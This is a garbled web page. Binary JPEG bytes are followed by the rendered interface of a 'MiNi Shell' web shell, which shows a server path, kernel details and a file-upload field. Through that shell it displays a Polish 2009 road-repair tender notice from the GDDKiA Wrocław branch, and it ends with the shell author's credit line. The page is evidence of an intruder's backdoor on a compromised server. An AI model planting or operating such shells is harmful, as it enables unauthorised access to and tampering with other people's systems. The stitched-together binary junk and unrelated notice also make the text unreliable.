JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090225/40224-N-2009.html

<p class="kh_header"><b>Wrocław: Remont nawierzchni oraz innych elementów pasa drogowego w ciągu dróg krajowych 
Nr 5, 94 i 36 w podziale na 3 części:
Część I: Remont nawierzchni i innych elementów pasa drogowego w ciągu drogi krajowej Nr 5,
Część II: Remont nawierzchni i innych elementów pasa drogowego w ciągu drogi krajowej Nr 94,36
Część III: Remont nawierzchni i innych elementów pasa drogowego w ciągu drogi krajowej Nr 36</b><br>
<b>Numer ogłoszenia: 40224 - 2009; data zamieszczenia: 25.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział we Wrocławiu , ul. Powstańców Śląskich 186, 53-139 Wrocław, woj. dolnośląskie, tel. 071 3347370, faks 071 334 73 63, 367 17 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gddkia.gov.pl Oddział we Wrocławiu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont nawierzchni oraz innych elementów pasa drogowego w ciągu dróg krajowych 
Nr 5, 94 i 36 w podziale na 3 części:
Część I: Remont nawierzchni i innych elementów pasa drogowego w ciągu drogi krajowej Nr 5,
Część II: Remont nawierzchni i innych elementów pasa drogowego w ciągu drogi krajowej Nr 94,36
Część III: Remont nawierzchni i innych elementów pasa drogowego w ciągu drogi krajowej Nr 36.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont nawierzchni oraz innych elementów pasa drogowego w ciągu dróg krajowych 
Nr 5, 94 i 36 w podziale na 3 części.
Zakres rzeczowy: remont cząstkowy nawierzchni bitum. przy użyciu masy min.asf. na gorąco - 6.000m2; układanie masy na powierzchni  ponad 10 m2- 6.700 m2; remont cząstkowy emulsją i grysami -350 Mg; frezowanie istniejącej nawierzchni - 1.200 m2; remont podbudowy z kruszywa: rozebranie podbudowy -100 m2, wykonanie warstwy odcinającej -50 m2;wykonanie podbudowy z kruszywa łamanego- 100 m2;remont poboczy: uzupełnianie i utwardzenie poboczy - 4000 m2, ścinka zawyżonych poboczy- 4.000 m2;remont elementów ulic:rozebranie chodników-120 m2, rozebranie krawężników- 80 m, rozebranie obrzeży- 60 m, przełożenie nawierzchni chodnika-80 m2, ustawienia krawężników -120 m, ustawienie obrzeży-50m, ułożenie ścieków-90 m;ułożenie kostki brukowej - 40 m2; remont elementów odwodnienia:regulacja pionowa wpustów ulicznych - 12 szt, regulacja pionowa włazu studni rewizyjnej - 3 szt; remont studzienek z wymianą kratek ściekowych - 10 szt.; remont studzienek z wymianą wpustu ściekowego - 4 szt; remont studni rewizyjnej z kompletną wymianą włazu - 1szt; rozbiórka uszkodzonych barier ochronnych stalowych - 380 m; ustawienie barier jednostronnych przekładkowych -150 m, ustawienie barier jednostronnych bezprzekładkowych - 180 m.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 22.000,00 PLN  (słownie złotych: dwadzieścia dwa tysiące 00/100 ) odpowiednio dla :
CZĘŚĆ I : 8.000,00 PLN  ( słownie złotych : osiem tysięcy  00/100 )
CZĘŚCI  II :   4.000,00 PLN  ( słownie złotych: cztery tysięcy 00/100 )   
CZĘŚCI  III : 10.000,00 PLN  ( słownie złotych: dziesięć tysięcy 00/100 )   
Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy :a) pieniądzu, przelewem na rachunek bankowy: w KREDYT BANK SA IV Oddział Wrocław, nr 431500 1793 1217 9002 3658 0000, b)  poręczeniach bankowych; c)  poręczeniach pieniężnych spółdzielczych kas oszczędnościowo-kredytowych;d)  gwarancjach bankowych ; e)  gwarancjach ubezpieczeniowych;f) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.jedn. Dz. U. z 2007 r. Nr 42, poz. 275).
Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone  w oryginale i musi obejmować cały okres związania ofertą.
Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu  mogą brać udział Wykonawcy nie podlegający wykluczeniu na podstawie art. 24  ustawy Pzp oraz spełniający niżej określone warunki udziału w postępowaniu.
Warunki udziału w postępowaniu, określone w oparciu o art. 22 ust. l pkt 1-3 ustawy Pzp. 
I. Potencjał ekonomiczno-finansowy : posiadanie środków finansowych i/lub zdolności 
kredytowej w wysokości nie mniejszej niż 70.000 zł dla każdej części;
II.  Potencjał kadrowy - Wykonawca musi mieć do dyspozycji osoby legitymujące się  
doświadczeniem i kwalifikacjami odpowiednimi do funkcji, jakie zostaną im powierzone  lub  przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia tych osób. 
Wykonawca przedstawi w ofercie osobę, która spełnia następujące wymagania: 
1)osoba proponowana do pełnienia funkcji Kierownika robót drogowych  
 a) minimalna liczba osób : 1 dla każdej Części, 
 b) minimalne doświadczenie i kwalifikacje:
- minimum 3 letnie doświadczenie na stanowisku Kierownika robót drogowych przy realizacji zadań obejmujących prace przy remontach nawierzchni dróg
-  uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności
drogowej  lub odpowiadające uprawnienia budowlane wydane na podstawie wcześniej
obowiązujących przepisów.
W przypadku złożenia ofert na kilka części, dla każdej z części należy wskazać innego
kierownika robót drogowych.
III. Potencjał techniczny - Wykonawca musi dysponować narzędziami i urządzeniami  i środkami transportu wymienionymi poniżej lub przedstawić pisemne zobowiązanie innych podmiotów do  ich udostępnienia. Minimalne wymagania dla każdej części : 1)Wytwórnia Mas Bitumicznych stacjonarna o wydajności min. 30 Mg/h *1) - 1 szt; 2) Mała wytwórnia przewoźna o min. wydajności 1 Mg/h *2) - 1 szt.; 3) Przecinarka z diamentowymi tarczami tnącymi ( do przycięcia krawędzi ) - 1 szt.; 4) Remonter natryskowy ( np. Patcher) - 1 szt.; 5) Lekki walec wibracyjny lub zagęszczarka płytowa - 1 szt.; 6) Szczotka mechaniczna - 1 szt.; 7) Termos do przewozu masy - 1 szt.; 8) Rozkładarka mas bitumicznych - 1 szt.; 9) Frezarka drogowa - 1 szt.; 10) Skrapiarka do bitumów - 1 szt.; 11) Koparko-ładowarka - 1 szt.; 12) Ścinarka lub równiarka - 1 szt.; 13) Ubijaki - 1 szt.; Środki transportu: 1) Samochód samowyładowczy zaopatrzony w plandekę - 1 szt.; 2) Samochód skrzyniowy - 1 szt.; 3) Samochód dostawczy - 1 szt. 
*1) W przypadku braku przez Wykonawcę własnej Wytwórni Mas Bitumicznych Zamawiający dopuszcza zakup masy od innego Wytwórcy
*2) Wykonawca składając ofertę na 2 lub 3 części może dysponować 1 małą wytwórnią. 
IV. Doświadczenie - Wykonawca  musi wykazać, że w okresie ostatnich 5 lat  przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie, zrealizował ( zakończył ) następujące rodzaje robót (dla każdej części) :
- remont masą mineralno-asfaltową na gorąco w ilości nie mniejszej niż 5.000m2
- remont emulsją i grysami w ilości nie mniejszej niż 4.000 m2
Informacja  dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
W przypadku tych  Wykonawców, żaden z nich nie może podlegać wykluczeniu na podsta-wie art. 24 ust.1 pkt 1-9 i ust. 2 ustawy Pzp, natomiast warunki określone w pkt. I-IV muszą
spełniać łącznie.Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie art. 24 ustawy Pzp. Podstawą oceny spełniania warunków będą w szczególności wymagane dokumenty i oświadczenia, o których mowa w pkt. III.2. ( poniżej ), na zasadzie spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla potwierdzenia spełnienia warunków, określonych w art.24 ust.1 pkt1)-9) ustawy Pzp,  Wykonawcy powinni przedłożyć niżej wymienione dokumenty: 
1.Oświadczenie o spełnianiu warunków postępowania, 
2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Oświadczenie o posiadanych środkach finansowych i/lub zdolności kredytowej Wykonawcy. 
4.Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia. W przypadku, gdy wykonawca wskaże w wykazie osoby, którymi nie będzie dysponował , musi załączyć pisemne zobowiązanie innych podmiotów do udostępnienia tych osób.Do wykazu należy dołączyć kopie uprawnień.
5. Wykaz narzędzi, urządzeń i środków transportu, którymi dysponuje lub będzie
dysponował Wykonawca  wymaganych dla realizacji przedmiotu  zamówienia. W przypadku, gdy Wykonawca wskaże w wykazie narzędzia, urządzenia i środki transportu, którymi nie będzie dysponował, musi załączyć pisemne zobowiązanie innych podmiotów do udostępnienia tych narzędzi, urządzeń i środków transportu.   
6. Informację o doświadczeniu Wykonawcy ( Doświadczenie zawodowe ). Do informacji powinny być dołączone dokumenty potwierdzające, że wymienione w informacji zadania zostały wykonane należycie. 
7. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium
 Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa:
1) w pkt 2. składa odpowiedni dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie
8. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 7., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
9. Dokumenty, o których mowa w pkt 7 i 8 winny być wystawione nie wcześniej niż odpowiadające im dokumenty określone w pkt. 2. 
10. Dokumenty i oświadczenia wymagane dla potwierdzenia spełnienia przez Wykonawców warunków są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Potwierdzenie za zgodność z oryginałem winno być sporządzone w sposób umożliwiający identyfikację podpisu ( np. wraz z imienną pieczątką osoby poświadczającej kopię dokumentu za zgodność z oryginałem ).
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski i poświadczone przez Wykonawcę.
11. W celu potwierdzenia spełnienia warunków wymaganych od Wykonawców wspólnie ubiegających się o udzielenie zamówienia 
a) oświadczenie wymienione w pkt 1 winno być złożone w imieniu wszystkich    wykonawców 
b) dokumenty wymienione w pkt 2  albo odpowiadające im określone w pkt 7 i 8 winny być złożone przez każdego Wykonawcę;
c) dokumenty wymienione w pkt 3 - 6 mogą dotyczyć dowolnego spośród wykonawców składających wspólną ofertę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gddkia.gov.pl Oddział we Wrocławiu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział we Wrocławiu, Rejon w Wołowie,
56-100 Wołów, Ul.Piłsudskiego 10, pokój Nr 9 po uprzednim uzgodnieniu telefonicznym .
Koszt 1 egz.  SIWZ 20 PLN.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2009 godzina 09:00, miejsce: Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział we Wrocławiu, Rejon w Wołowie,
56-100 Wołów, Ul.Piłsudskiego 10, pokój Nr 1 - Sekretariat..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com